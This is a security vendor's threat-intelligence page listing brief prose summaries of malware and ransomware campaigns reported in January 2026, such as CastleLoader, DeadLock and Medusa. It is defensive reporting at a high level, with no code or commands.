Securonix Threat Labs
Get up-to-date threat content from the experts at Securonix Threat Labs.
Uncover the threats of tomorrow, today.
Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.
Powered by Threat Labs
Autonomous Threat Sweeper
Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.
Latest ATS Entries
All indicators of compromise (IOC) and search queries are available on our GitHub repository.
CastleLoader_Stealthy_Loader_Targeting_Governments
HIGH
+
—
- Intel Source:
- Any.Run
- Intel Name:
- CastleLoader_Stealthy_Loader_Targeting_Governments
- Date of Scan:
- 2026-01-16
- Impact:
- HIGH
- Summary:
- Researchers at ANY.RUN have identified a new variant of CastleLoader, a sophisticated multi-stage loader actively targeting government organizations and related infrastructure sectors. The malware functions as an initial access broker, delivering secondary payloads such as information stealers and remote access trojans while evading detection through complex execution chains. CastleLoader leverages an Inno Setup installer combined with AutoIt scripts to stage and deploy encrypted payloads, masking malicious activity behind legitimate installer behavior. Once executed, it uses process injection and API-level manipulation to execute in memory, bypassing static detection and endpoint monitoring tools. The analysis revealed deliberate use of API hashing, dynamic function resolution, and kernel-level process manipulation to conceal operations. Telemetry indicates CastleLoader’s capability to deliver multiple payloads while maintaining persistence, credential theft, and network reconnaissance functionality. Its modular design allows it to adapt across environments, suggesting ongoing development and use by organized threat actors.
New_Magecart_Campaign
MEDIUM
+
—
- Intel Source:
- Slient Push
- Intel Name:
- New_Magecart_Campaign
- Date of Scan:
- 2026-01-16
- Impact:
- MEDIUM
- Summary:
- Silent Push researchers have identified a previously untracked Magecart-style web-skimming operation active since at least early 2022. The campaign compromises e-commerce websites and injects malicious JavaScript designed to capture payment card details and other personal data entered at checkout. The group shows moderate to advanced capability through heavy JavaScript obfuscation, dynamic execution paths, DOM monitoring, and self-removal routines intended to minimize discovery. The campaign mainly affects online shoppers and the businesses that unknowingly host the malicious code, creating losses from card fraud, identity theft, and reputational damage. The operation relies on rotating third-party domains to extend longevity and avoid takedown efforts.
DeadLock_Ransomware
MEDIUM
+
—
- Intel Source:
- Group IB
- Intel Name:
- DeadLock_Ransomware
- Date of Scan:
- 2026-01-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Group-IB have identified a new ransomware family known as DeadLock, which first emerged in July 2025 and has steadily expanded its tooling and infrastructure since its emergence. DeadLock distinguishes itself by abusing Polygon blockchain smart contracts to store and rotate proxy addresses supporting both the malware and its web-based ransom note infrastructure. Once executed, the ransomware encrypts files, alters extensions, replaces desktop wallpapers, and delivers ransom notes that increasingly assert data theft. The threat actors also rely on AnyDesk for remote access and execute PowerShell commands to terminate services, delete shadow copies, and remove evidence of the malware. DeadLock primarily targets organizations rather than individuals, aiming to cause widespread operational disruption, increase the risk of sensitive data exposure, and hinder recovery efforts by destroying backups.
RedVDS_Virtual_Desktop_Infrastructure_Abuse
HIGH
+
—
- Intel Source:
- Microsoft
- Intel Name:
- RedVDS_Virtual_Desktop_Infrastructure_Abuse
- Date of Scan:
- 2026-01-16
- Impact:
- HIGH
- Summary:
- Researchers at Microsoft have identified RedVDS as a maliciously aligned virtual desktop hosting platform widely exploited by multiple threat actors for phishing, business email compromise attacks, and financial fraud. The service offers low-cost Windows-based remote servers that provide full administrative control and generate minimal logging, enabling attackers to operate with limited visibility. RedVDS supports rapid provisioning of cloned servers, accepts anonymous cryptocurrency payments, and permits unrestricted use for mass mailing, credential theft, and identity impersonation. There are multiple groups abusing the platform, including Storm-0259 and Storm-2470, rather than a lone operator. Impacted sectors include legal, construction, manufacturing, real estate, healthcare, and education. The RedVDS-enabled activity has contributed to more than $40 million in reported fraud losses in the United States since March 2025.
VoidLink_Advanced_Cloud_Native_Linux_Malware
HIGH
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- VoidLink_Advanced_Cloud_Native_Linux_Malware
- Date of Scan:
- 2026-01-15
- Impact:
- HIGH
- Summary:
- Researchers at Check Point Research have identified a sophisticated Linux malware framework named VoidLink, engineered to achieve persistent, stealthy control across cloud and containerized environments. Developed in Zig, VoidLink leverages a highly modular architecture built around a custom plugin API, enabling dynamic deployment of more than thirty modules and numerous specialized plugins for reconnaissance, persistence, and privilege escalation. The framework demonstrates adaptive operational security (OPSEC) behavior, dynamically adjusting its evasion strategies based on the detected security posture, container type, or cloud provider—covering AWS, Azure, and GCP, among others.
ShellBot_Linux_SSH_DDoS_Botnet_Surge
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- ShellBot_Linux_SSH_DDoS_Botnet_Surge
- Date of Scan:
- 2026-01-15
- Impact:
- HIGH
- Summary:
- Researchers at AhnLab Security Intelligence Center (ASEC) have identified an ongoing campaign targeting Linux SSH servers in the fourth quarter of 2025, driven primarily by the long-active threat group RUBYCARP using the ShellBot (PerlBot) malware family. The attacks rely on brute-force and dictionary-based intrusion attempts against poorly secured SSH services, leading to large-scale deployments of DDoS-capable bots. Once compromised, the systems are enrolled into an IRC-controlled botnet capable of executing multiple commands, including flooding, port scanning, file downloads, and remote command execution.
Andariel_TigerRAT_Web_Server_Intrusions
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- Andariel_TigerRAT_Web_Server_Intrusions
- Date of Scan:
- 2026-01-14
- Impact:
- HIGH
- Summary:
- Researchers at AhnLab Security Intelligence Center (ASEC) have identified ongoing intrusion activity attributed to the Andariel threat group, targeting Windows-based web servers during the fourth quarter of 2025. The attacks involved the deployment of the TigerRAT backdoor through compromised IIS environments, where threat actors likely used web shells to gain initial access. Once inside, Andariel operators executed reconnaissance and system commands to enumerate host information and then leveraged PowerShell to retrieve additional payloads from external servers. TigerRAT enabled remote command execution, credential theft, screen capture, and tunneling capabilities, facilitating long-term control over compromised systems. The adversaries employed privilege escalation tools such as PrintSpoofer and Potato variants to gain elevated access and utilized ProcDump to extract sensitive credentials.
Trigona_Targeting_Windows_SQL_Servers
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- Trigona_Targeting_Windows_SQL_Servers
- Date of Scan:
- 2026-01-14
- Impact:
- HIGH
- Summary:
- Researchers at AhnLab Security Intelligence Center (ASEC) have identified a resurgence of the Trigona threat actor targeting Windows-based database servers, particularly MS-SQL and MySQL, during the fourth quarter of 2025. The attackers leveraged legitimate administrative tools and system components to execute and conceal their operations, notably abusing the CLR Shell for command execution and privilege escalation. They also employed Bulk Copy Program (bcp.exe) to move malware between databases and local file systems, enabling infection directly through SQL environments. Trigona actors were observed deploying multiple payloads using Bitsadmin, Curl, and PowerShell to download additional malware, while maintaining persistence through remote access utilities such as AnyDesk and RustDesk.
Konni_PowerShell_Espionage_via_LNK_Decoy
MEDIUM
+
—
- Intel Source:
- Dreaming Bluebird
- Intel Name:
- Konni_PowerShell_Espionage_via_LNK_Decoy
- Date of Scan:
- 2026-01-13
- Impact:
- MEDIUM
- Summary:
- Researchers at Dreaming Bluebird have identified a new PowerShell-based malware attributed to the North Korean threat group Konni, disguised as a national security document. The campaign employs a malicious shortcut file titled National Security Report 2.lnk, which masquerades as a legitimate policy report related to the 9th Congress of the Workers' Party of Korea. When executed, the shortcut triggers a hidden PowerShell script configured with execution policy bypass and invisible window settings to evade user awareness. The script reconstructs and launches multiple embedded payloads, including a decoy document, executable, and supporting database files, suggesting a staged infection chain.
Medusa_Ransomware_RMM_Abuse_Campaigns
HIGH
+
—
- Intel Source:
- darktrace
- Intel Name:
- Medusa_Ransomware_RMM_Abuse_Campaigns
- Date of Scan:
- 2026-01-13
- Impact:
- HIGH
- Summary:
- Researchers from Darktrace have uncovered a large-scale ransomware campaign conducted by the Medusa ransomware-as-a-service operation. Active since at least 2022 and expanding rapidly through 2024 and 2025, Medusa has emerged as one of the most active ransomware groups globally, with more than 500 confirmed victim organizations. The group’s primary objective is financial extortion through a combination of data theft, encryption, and operational disruption. Medusa actors typically obtain initial access through initial access brokers or by exploiting unpatched, internet-facing systems, including file transfer and remote management software. Following access, the attackers heavily abuse legitimate remote monitoring and management tools instead of relying solely on custom malware. These tools enable stealthy persistence, lateral movement, command-and-control, and large-scale data exfiltration while blending into normal administrative behavior. Prior to deploying ransomware, the group stages and exfiltrates sensitive data to attacker-controlled infrastructure. Ransomware execution is then performed directly on victim systems, encrypting files and delivering ransom notes. The combination of trusted tooling abuse, broad sector targeting, and triple-extortion tactics makes Medusa a high-impact and difficult-to-detect ransomware threat.
Threat Content
Shared Security Content on Sigma
Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.
Why Security Content Matters
Learn how Securonix is paving the way to make precise, and actionable security content a reality for our customers.
